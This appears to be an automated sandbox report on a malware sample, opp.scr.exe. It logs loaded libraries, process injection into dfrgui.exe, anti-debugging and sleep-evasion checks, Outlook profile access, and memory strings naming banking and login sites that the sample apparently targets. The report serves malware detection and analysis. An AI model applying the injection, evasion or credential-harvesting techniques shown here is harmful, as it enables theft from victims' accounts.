          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: sxshared.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Google Drive.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: C:\Users\user\Desktop\opp.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: opp.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: opp.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: opp.scr.exe, 00000000.00000002.1993405256.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, opp.scr.exe, 00000000.00000002.1992294507.00000000030D1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dfrgui.pdb source: opp.scr.exe, 00000001.00000002.2393570245.0000000001207000.00000004.00000020.00020000.00000000.sdmp, oOOsxwAhjIw.exe, 00000008.00000002.3857446926.0000000000988000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dfrgui.pdbGCTL source: opp.scr.exe, 00000001.00000002.2393570245.0000000001207000.00000004.00000020.00020000.00000000.sdmp, oOOsxwAhjIw.exe, 00000008.00000002.3857446926.0000000000988000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oOOsxwAhjIw.exe, 00000008.00000002.3856743895.000000000022E000.00000002.00000001.01000000.00000009.sdmp, oOOsxwAhjIw.exe, 0000000A.00000000.2462623860.000000000022E000.00000002.00000001.01000000.00000009.sdmp
          Source: Binary string: wntdll.pdbUGP source: opp.scr.exe, 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000003.2399221068.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2689855122.000000000453E000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000003.2391671200.0000000004031000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2689855122.00000000043A0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: opp.scr.exe, opp.scr.exe, 00000001.00000002.2394022437.0000000001660000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, dfrgui.exe, 00000009.00000003.2399221068.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2689855122.000000000453E000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000003.2391671200.0000000004031000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000009.00000002.2689855122.00000000043A0000.00000040.00001000.00020000.00000000.sdmp
          Source: opp.scr.exeStatic PE information: 0xEDF99A74 [Sun Jul 8 03:56:36 2096 UTC]
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0041B855 pushad ; iretd 1_2_0041B884
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_00407936 push eax; iretd 1_2_00407937
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004191E7 push ecx; ret 1_2_004191E8
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_00415A7A push esi; retf 1_2_00415AB4
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_004202B7 push esi; retf 1_2_004202B8
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0040EB41 push 7B0B5DBBh; iretd 1_2_0040EB4A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0042F3B2 push eax; ret 1_2_0042F3B4
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_00419C00 pushad ; retf 1_2_00419C2D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_00415C3E push esp; retf 1_2_00415C8E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_00403640 push eax; ret 1_2_00403642
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0041F75D push eax; iretd 1_2_0041F75E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016909AD push ecx; mov dword ptr [esp], ecx1_2_016909B6
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_051315A9 push eax; iretd 8_2_051315AA
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_05119782 push eax; iretd 8_2_05119783
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_0512D6A1 pushad ; iretd 8_2_0512D6D0
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_05132103 push esi; retf 8_2_05132104
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_0512098D push 7B0B5DBBh; iretd 8_2_05120996
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_051411FE push eax; ret 8_2_05141200
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_0512B033 push ecx; ret 8_2_0512B034
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_0513220B push eax; ret 8_2_05132233
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exeCode function: 8_2_0512BA4C pushad ; retf 8_2_0512BA79
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043A27FA pushad ; ret 9_2_043A27F9
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043A225F pushad ; ret 9_2_043A27F9
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043A283D push eax; iretd 9_2_043A2858
          Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 9_2_043D09AD push ecx; mov dword ptr [esp], ecx9_2_043D09B6
          Source: opp.scr.exeStatic PE information: section name: .text entropy: 7.698137982224532
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D096E rdtsc 1_2_016D096E
          Source: C:\Users\user\Desktop\opp.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeAPI coverage: 1.3 %
          Source: C:\Windows\SysWOW64\dfrgui.exeAPI coverage: 1.5 %
          Source: C:\Users\user\Desktop\opp.scr.exe TID: 1964Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\IbZIyGTNRRgnjGfKKCjfPwQYwyfKGixnBYPXdPAqeWGGHEs\oOOsxwAhjIw.exe TID: 7932Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\opp.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: dfrgui.exe, 00000009.00000002.2694306221.0000000007746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20
          Source: 13d6pS3.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: dfrgui.exe, 00000009.00000002.2694306221.0000000007746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,1169642
          Source: dfrgui.exe, 00000009.00000002.2694306221.0000000007746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: agement pageVMware20,11696428655
          Source: 13d6pS3.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: 13d6pS3.9.drBinary or memory string: discord.comVMware20,11696428655f
          Source: 13d6pS3.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: 13d6pS3.9.drBinary or memory string: global block list test formVMware20,11696428655
          Source: dfrgui.exe, 00000009.00000002.2694306221.0000000007746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696428655|UE
          Source: 13d6pS3.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: oOOsxwAhjIw.exe, 0000000A.00000002.3857549327.000000000097F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf
          Source: 13d6pS3.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: 13d6pS3.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: 13d6pS3.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: dfrgui.exe, 00000009.00000002.2694306221.0000000007746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n.utiitsl.comVMware20,11696428655h
          Source: 13d6pS3.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: 13d6pS3.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: 13d6pS3.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: 13d6pS3.9.drBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: 13d6pS3.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: 13d6pS3.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: dfrgui.exe, 00000009.00000002.2688193511.000000000045A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: 13d6pS3.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: dfrgui.exe, 00000009.00000002.2694306221.0000000007746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sswords blocklistVMware20,11696428655
          Source: 13d6pS3.9.drBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: 13d6pS3.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: 13d6pS3.9.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: 13d6pS3.9.drBinary or memory string: AMC password management pageVMware20,11696428655
          Source: 13d6pS3.9.drBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: 13d6pS3.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: 13d6pS3.9.drBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: 13d6pS3.9.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: 13d6pS3.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: 13d6pS3.9.drBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: 13d6pS3.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: 13d6pS3.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: 13d6pS3.9.drBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: 13d6pS3.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: dfrgui.exe, 00000009.00000002.2694306221.0000000007746000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,W
          Source: 13d6pS3.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: C:\Users\user\Desktop\opp.scr.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\dfrgui.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D096E rdtsc 1_2_016D096E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_00418BA3 LdrLoadDll,1_2_00418BA3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764164 mov eax, dword ptr fs:[00000030h]1_2_01764164
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764164 mov eax, dword ptr fs:[00000030h]1_2_01764164
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01728158 mov eax, dword ptr fs:[00000030h]1_2_01728158
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01724144 mov eax, dword ptr fs:[00000030h]1_2_01724144
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01724144 mov eax, dword ptr fs:[00000030h]1_2_01724144
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01724144 mov ecx, dword ptr fs:[00000030h]1_2_01724144
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01724144 mov eax, dword ptr fs:[00000030h]1_2_01724144
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01724144 mov eax, dword ptr fs:[00000030h]1_2_01724144
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696154 mov eax, dword ptr fs:[00000030h]1_2_01696154
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696154 mov eax, dword ptr fs:[00000030h]1_2_01696154
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168C156 mov eax, dword ptr fs:[00000030h]1_2_0168C156
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C0124 mov eax, dword ptr fs:[00000030h]1_2_016C0124
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01750115 mov eax, dword ptr fs:[00000030h]1_2_01750115
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173A118 mov ecx, dword ptr fs:[00000030h]1_2_0173A118
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173A118 mov eax, dword ptr fs:[00000030h]1_2_0173A118
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173A118 mov eax, dword ptr fs:[00000030h]1_2_0173A118
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173A118 mov eax, dword ptr fs:[00000030h]1_2_0173A118
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov eax, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov ecx, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov eax, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov eax, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov ecx, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov eax, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov eax, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov ecx, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov eax, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173E10E mov ecx, dword ptr fs:[00000030h]1_2_0173E10E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017661E5 mov eax, dword ptr fs:[00000030h]1_2_017661E5
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C01F8 mov eax, dword ptr fs:[00000030h]1_2_016C01F8
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E1D0 mov eax, dword ptr fs:[00000030h]1_2_0170E1D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E1D0 mov eax, dword ptr fs:[00000030h]1_2_0170E1D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E1D0 mov ecx, dword ptr fs:[00000030h]1_2_0170E1D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E1D0 mov eax, dword ptr fs:[00000030h]1_2_0170E1D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E1D0 mov eax, dword ptr fs:[00000030h]1_2_0170E1D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017561C3 mov eax, dword ptr fs:[00000030h]1_2_017561C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017561C3 mov eax, dword ptr fs:[00000030h]1_2_017561C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D0185 mov eax, dword ptr fs:[00000030h]1_2_016D0185
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171019F mov eax, dword ptr fs:[00000030h]1_2_0171019F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171019F mov eax, dword ptr fs:[00000030h]1_2_0171019F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171019F mov eax, dword ptr fs:[00000030h]1_2_0171019F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171019F mov eax, dword ptr fs:[00000030h]1_2_0171019F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01734180 mov eax, dword ptr fs:[00000030h]1_2_01734180
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01734180 mov eax, dword ptr fs:[00000030h]1_2_01734180
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174C188 mov eax, dword ptr fs:[00000030h]1_2_0174C188
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174C188 mov eax, dword ptr fs:[00000030h]1_2_0174C188
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168A197 mov eax, dword ptr fs:[00000030h]1_2_0168A197
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168A197 mov eax, dword ptr fs:[00000030h]1_2_0168A197
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168A197 mov eax, dword ptr fs:[00000030h]1_2_0168A197
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BC073 mov eax, dword ptr fs:[00000030h]1_2_016BC073
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01716050 mov eax, dword ptr fs:[00000030h]1_2_01716050
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01692050 mov eax, dword ptr fs:[00000030h]1_2_01692050
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01726030 mov eax, dword ptr fs:[00000030h]1_2_01726030
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168A020 mov eax, dword ptr fs:[00000030h]1_2_0168A020
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168C020 mov eax, dword ptr fs:[00000030h]1_2_0168C020
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01714000 mov ecx, dword ptr fs:[00000030h]1_2_01714000
